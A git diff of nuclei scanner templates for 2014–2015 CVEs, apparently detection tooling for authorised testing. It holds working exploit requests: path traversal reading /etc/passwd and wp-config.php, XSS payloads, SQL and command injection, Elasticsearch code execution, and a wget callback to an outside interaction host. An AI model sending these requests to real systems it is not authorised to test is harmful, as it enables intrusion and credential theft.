DhiyaneshDk + severity: low + description: | + The EasyCart (wp-easycart) plugin before 2.0.6 for WordPress allows remote attackers to obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. + reference: + - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150 + - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4942 + tags: cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "PHP Extension" + - "PHP Version" + condition: and + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' diff --git a/nuclei-templates/CVE-2014/cve-2014-5258.yaml b/nuclei-templates/CVE-2014/CVE-2014-5258.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-5258.yaml rename to nuclei-templates/CVE-2014/CVE-2014-5258.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-5368.yaml b/nuclei-templates/CVE-2014/CVE-2014-5368.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-5368.yaml rename to nuclei-templates/CVE-2014/CVE-2014-5368.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-6271.yaml b/nuclei-templates/CVE-2014/CVE-2014-6271.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-6271.yaml rename to nuclei-templates/CVE-2014/CVE-2014-6271.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-8799.yaml b/nuclei-templates/CVE-2014/CVE-2014-8799.yaml deleted file mode 100644 index 20d7d58d69..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-8799.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2014-8799 - -info: - name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2014-8799 - - https://www.exploit-db.com/exploits/35346 - - https://www.cvedetails.com/cve/CVE-2014-8799 - tags: cve,cve2014,wordpress,wp-plugin,lfi - classification: - cve-id: CVE-2014-8799 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php" - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - - "DB_USER" - - "DB_HOST" - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/cve-2014-9444.yaml b/nuclei-templates/CVE-2014/CVE-2014-9444.yaml similarity index 100% rename from nuclei-templates/CVE-2014/cve-2014-9444.yaml rename to nuclei-templates/CVE-2014/CVE-2014-9444.yaml diff --git a/nuclei-templates/CVE-2014/CVE-2014-9608.yaml b/nuclei-templates/CVE-2014/CVE-2014-9608.yaml deleted file mode 100644 index 2067b048e2..0000000000 --- a/nuclei-templates/CVE-2014/CVE-2014-9608.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2014-9608 - -info: - name: Netsweeper 4.0.3 - Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. - reference: - - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - - https://nvd.nist.gov/vuln/detail/CVE-2014-9608 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2014-9608 - cwe-id: CWE-79 - tags: cve,cve2014,netsweeper,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/cve-2014-1203.yaml b/nuclei-templates/CVE-2014/cve-2014-1203.yaml new file mode 100644 index 0000000000..d8e32964a8 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-1203.yaml @@ -0,0 +1,39 @@ +id: CVE-2014-1203 + +info: + name: Eyou E-Mail <3.6 - Remote Code Execution + author: pikpikcu + severity: critical + description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + - https://nvd.nist.gov/vuln/detail/CVE-2014-1203 + - http://seclists.org/fulldisclosure/2014/Jan/32 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2014-1203 + cwe-id: CWE-77 + tags: seclists,rce,eyou + +requests: + - raw: + - | + POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type='|cat /etc/passwd||' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2014/cve-2014-2321.yaml b/nuclei-templates/CVE-2014/cve-2014-2321.yaml deleted file mode 100644 index 7f328db084..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-2321.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2014-2321 - -info: - name: ZTE Cable Modem Web Shell - author: geeknik - severity: high - description: | - ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. - reference: - - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/ - - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ - - https://nvd.nist.gov/vuln/detail/CVE-2014-2321 - - http://www.kb.cert.org/vuls/id/600724 - classification: - cve-id: CVE-2014-2321 - tags: iot,cve,cve2014,zte - -requests: - - method: GET - path: - - "{{BaseURL}}/web_shell_cmd.gch" - - matchers-condition: and - matchers: - - type: word - words: - - "please input shell command" - - "ZTE Corporation. All rights reserved" - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/01 diff --git a/nuclei-templates/CVE-2014/cve-2014-2323.yaml b/nuclei-templates/CVE-2014/cve-2014-2323.yaml new file mode 100644 index 0000000000..c813730817 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-2323.yaml @@ -0,0 +1,32 @@ +id: CVE-2014-2323 + +info: + name: Lighttpd 1.4.34 SQL Injection and Path Traversal + author: geeknik + severity: critical + description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname). + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-2323 + - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt + - http://www.lighttpd.net/2014/3/12/1.4.35/ + - http://seclists.org/oss-sec/2014/q1/561 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2014-2323 + cwe-id: CWE-89 + tags: cve,cve2014,sqli,lighttpd,injection + +requests: + - raw: + - |+ + GET /etc/passwd HTTP/1.1 + Host: [::1]' UNION SELECT '/ + + unsafe: true + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + +# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/cve-2014-2383.yaml b/nuclei-templates/CVE-2014/cve-2014-2383.yaml new file mode 100644 index 0000000000..bb404d9069 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-2383.yaml @@ -0,0 +1,42 @@ +id: CVE-2014-2383 + +info: + name: Arbitrary file read in dompdf < v0.6.0 + author: 0x_Akoko + severity: high + description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-2383 + - https://www.exploit-db.com/exploits/33004 + - http://seclists.org/fulldisclosure/2014/Apr/258 + - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/ + classification: + cve-id: CVE-2014-2383 + metadata: + unix-payload: /dompdf.php?input_file=/etc/passwd + win-payload: /dompdf.php?input_file=C:/windows/win.ini + tags: cve,cve2014,dompdf,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/dompdf.php?input_file=dompdf.php" + - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php" + - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php" + - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "application/pdf" + - 'filename="dompdf_out.pdf"' + part: header + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/cve-2014-2962.yaml b/nuclei-templates/CVE-2014/cve-2014-2962.yaml new file mode 100644 index 0000000000..2c2c67d121 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-2962.yaml @@ -0,0 +1,34 @@ +id: CVE-2014-2962 + +info: + name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal + author: daffainfo + severity: high + description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + reference: + - https://www.kb.cert.org/vuls/id/774788 + - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l + - http://www.kb.cert.org/vuls/id/774788 + - http://www.belkin.com/us/support-article?articleNum=109400 + remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. + classification: + cve-id: CVE-2014-2962 + tags: cve,cve2014,lfi,router,firmware,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/23 diff --git a/nuclei-templates/CVE-2014/cve-2014-3120.yaml b/nuclei-templates/CVE-2014/cve-2014-3120.yaml new file mode 100644 index 0000000000..437057bc90 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-3120.yaml @@ -0,0 +1,60 @@ +id: CVE-2014-3120 + +info: + name: ElasticSearch v1.1.1/1.2 RCE + author: pikpikcu + severity: critical + description: | + The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. + reference: + - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 + - https://www.elastic.co/blog/logstash-1-4-3-released + - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 + - http://bouk.co/blog/elasticsearch-rce/ + classification: + cve-id: CVE-2014-3120 + tags: cve,cve2014,elastic,rce,elasticsearch + +requests: + - raw: + - | + POST /_search?pretty HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en + Content-Type: application/x-www-form-urlencoded + + { + "size": 1, + "query": { + "filtered": { + "query": { + "match_all": { + } + } + } + }, + "script_fields": { + "command": { + "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();" + } + } + } + + matchers-condition: and + matchers: + - type: word + words: + - "application/json" + part: header + + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/cve-2014-3206.yaml b/nuclei-templates/CVE-2014/cve-2014-3206.yaml new file mode 100644 index 0000000000..93e697d674 --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-3206.yaml @@ -0,0 +1,38 @@ +id: CVE-2014-3206 + +info: + name: Seagate BlackArmor NAS - Command Injection + author: gy741 + severity: critical + description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-3206 + - https://www.exploit-db.com/exploits/33159 + - https://www.exploit-db.com/exploits/33159/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2014-3206 + cwe-id: CWE-20 + tags: cve,cve2014,seagate,rce + +requests: + - raw: + - | + GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + unsafe: true + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + +# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/cve-2014-4535.yaml b/nuclei-templates/CVE-2014/cve-2014-4535.yaml new file mode 100644 index 0000000000..23d27ce4bf --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-4535.yaml @@ -0,0 +1,40 @@ +id: CVE-2014-4535 + +info: + name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php. + reference: + - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd + - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 + - http://codevigilant.com/disclosure/wp-plugin-import-legacy-media-a3-cross-site-scripting-xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2014-4535 + cwe-id: CWE-79 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/nuclei-templates/CVE-2014/cve-2014-4942.yaml b/nuclei-templates/CVE-2014/cve-2014-4942.yaml deleted file mode 100644 index f3a59d9039..0000000000 --- a/nuclei-templates/CVE-2014/cve-2014-4942.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2014-4942 - -info: - name: WordPress EasyCart <2.0.6 - Information Disclosure - author: DhiyaneshDk - severity: low - description: | - WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. - reference: - - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150 - - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942 - - https://nvd.nist.gov/vuln/detail/CVE-2014-4942 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cve-id: CVE-2014-4942 - cwe-id: CWE-200 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "PHP Extension" - - "PHP Version" - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '>PHP Version <\/td>([0-9.]+)' - -# Enhanced by mp on 2022/09/30 diff --git a/nuclei-templates/CVE-2014/CVE-2014-8682.yaml b/nuclei-templates/CVE-2014/cve-2014-8682.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-8682.yaml rename to nuclei-templates/CVE-2014/cve-2014-8682.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-8799.yaml b/nuclei-templates/CVE-2014/cve-2014-8799.yaml new file mode 100644 index 0000000000..b462c7325c --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-8799.yaml @@ -0,0 +1,37 @@ +id: CVE-2014-8799 + +info: + name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal + author: daffainfo + severity: high + description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-8799 + - https://www.exploit-db.com/exploits/35346 + - https://www.cvedetails.com/cve/CVE-2014-8799 + - https://wordpress.org/plugins/dukapress/changelog/ + classification: + cve-id: CVE-2014-8799 + tags: cve,cve2014,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php" + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + - "DB_USER" + - "DB_HOST" + part: body + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2014/cve-2014-9608.yaml b/nuclei-templates/CVE-2014/cve-2014-9608.yaml new file mode 100644 index 0000000000..ecb6d6688a --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-9608.yaml @@ -0,0 +1,40 @@ +id: CVE-2014-9608 + +info: + name: Netsweeper 4.0.3 - Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + - https://nvd.nist.gov/vuln/detail/CVE-2014-9608 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2014-9608 + cwe-id: CWE-79 + tags: cve,cve2014,netsweeper,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/nuclei-templates/CVE-2015/cve-2015-0554.yaml b/nuclei-templates/CVE-2015/CVE-2015-0554.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-0554.yaml rename to nuclei-templates/CVE-2015/CVE-2015-0554.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-1000012.yaml b/nuclei-templates/CVE-2015/CVE-2015-1000012.yaml deleted file mode 100644 index 0dd86c0884..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-1000012.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2015-1000012 - -info: - name: WordPress MyPixs <=0.3 - Local File Inclusion - author: daffainfo - severity: high - description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability. - reference: - - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 - - http://www.vapidlabs.com/advisory.php?v=154 - - https://nvd.nist.gov/vuln/detail/CVE-2015-1000012 - - http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2015-1000012 - cwe-id: CWE-200 - tags: cve,cve2015,wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/06 diff --git a/nuclei-templates/CVE-2015/cve-2015-1880.yaml b/nuclei-templates/CVE-2015/CVE-2015-1880.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-1880.yaml rename to nuclei-templates/CVE-2015/CVE-2015-1880.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-2067.yaml b/nuclei-templates/CVE-2015/CVE-2015-2067.yaml deleted file mode 100644 index 192dee2d59..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-2067.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2015-2067 - -info: - name: Magento Server MAGMI - Directory Traversal - author: daffainfo - severity: high - description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/35996 - - https://nvd.nist.gov/vuln/detail/CVE-2015-2067 - - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html - classification: - cve-id: CVE-2015-2067 - metadata: - shodan-query: http.component:"Magento" - tags: cve,cve2015,lfi,magento,magmi,plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/08 diff --git a/nuclei-templates/CVE-2015/cve-2015-2068.yaml b/nuclei-templates/CVE-2015/CVE-2015-2068.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-2068.yaml rename to nuclei-templates/CVE-2015/CVE-2015-2068.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-3224.yaml b/nuclei-templates/CVE-2015/CVE-2015-3224.yaml deleted file mode 100644 index 157fd2451d..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-3224.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2015-3224 -info: - name: Ruby on Rails Web Console - Remote Code Execution - author: pdteam - severity: critical - description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. - reference: - - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ - - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ - - https://hackerone.com/reports/44513 - - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 - classification: - cve-id: CVE-2015-3224 - tags: cve,cve2015,rce,rails,ruby -requests: - - method: GET - path: - - "{{BaseURL}}/{{randstr}}" - headers: - X-Forwarded-For: ::1 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Rails.root:" - - "Action Controller: Exception caught" - condition: and - - type: word - part: response - words: - - "X-Web-Console-Session-Id" - - "data-remote-path=" - - "data-session-id=" - case-insensitive: true - condition: or - -# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2015/CVE-2015-3337.yaml b/nuclei-templates/CVE-2015/CVE-2015-3337.yaml deleted file mode 100644 index 6a683cf9f6..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-3337.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2015-3337 - -info: - name: Elasticsearch - Local File Inclusion - author: pdteam - severity: high - description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled. - reference: - - https://www.exploit-db.com/exploits/37054/ - - http://web.archive.org/web/20210121084446/https://www.securityfocus.com/archive/1/535385 - - https://www.elastic.co/community/security - - http://www.debian.org/security/2015/dsa-3241 - - https://nvd.nist.gov/vuln/detail/CVE-2015-3337 - classification: - cve-id: CVE-2015-3337 - tags: edb,cve,cve2015,elastic,lfi,elasticsearch,plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/08 diff --git a/nuclei-templates/CVE-2015/cve-2015-3897.yaml b/nuclei-templates/CVE-2015/CVE-2015-3897.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-3897.yaml rename to nuclei-templates/CVE-2015/CVE-2015-3897.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-4414.yaml b/nuclei-templates/CVE-2015/CVE-2015-4414.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-4414.yaml rename to nuclei-templates/CVE-2015/CVE-2015-4414.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-5461.yaml b/nuclei-templates/CVE-2015/CVE-2015-5461.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-5461.yaml rename to nuclei-templates/CVE-2015/CVE-2015-5461.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-5471.yaml b/nuclei-templates/CVE-2015/CVE-2015-5471.yaml deleted file mode 100644 index 4c6adff168..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-5471.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: CVE-2015-5471 -info: - name: Swim Team <= v1.44.10777 - Local File Inclusion - author: 0x_Akoko - severity: high - reference: https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 - tags: wordpress,plugin,wp,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-6544.yaml b/nuclei-templates/CVE-2015/CVE-2015-6544.yaml deleted file mode 100644 index 61f14ea40b..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-6544.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2015-6544 - -info: - name: Combodo iTop <2.2.0-2459 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: | - Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title. - reference: - - https://www.htbridge.com/advisory/HTB23268 - - http://sourceforge.net/p/itop/tickets/1114/ - - http://sourceforge.net/p/itop/code/3662/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-6544 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2015-6544 - cwe-id: CWE-79 - tags: cve,cve2015,xss,itop - -requests: - - method: GET - path: - - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/08/12 diff --git a/nuclei-templates/CVE-2015/CVE-2015-7377.yaml b/nuclei-templates/CVE-2015/CVE-2015-7377.yaml deleted file mode 100644 index 5885cbdcdc..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-7377.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2015-7377 - -info: - name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: "Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI." - reference: - - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2015-7377 - classification: - cve-id: CVE-2015-7377 - tags: cve,cve2015,wordpress,wp-plugin,xss - -requests: - - method: GET - path: - - 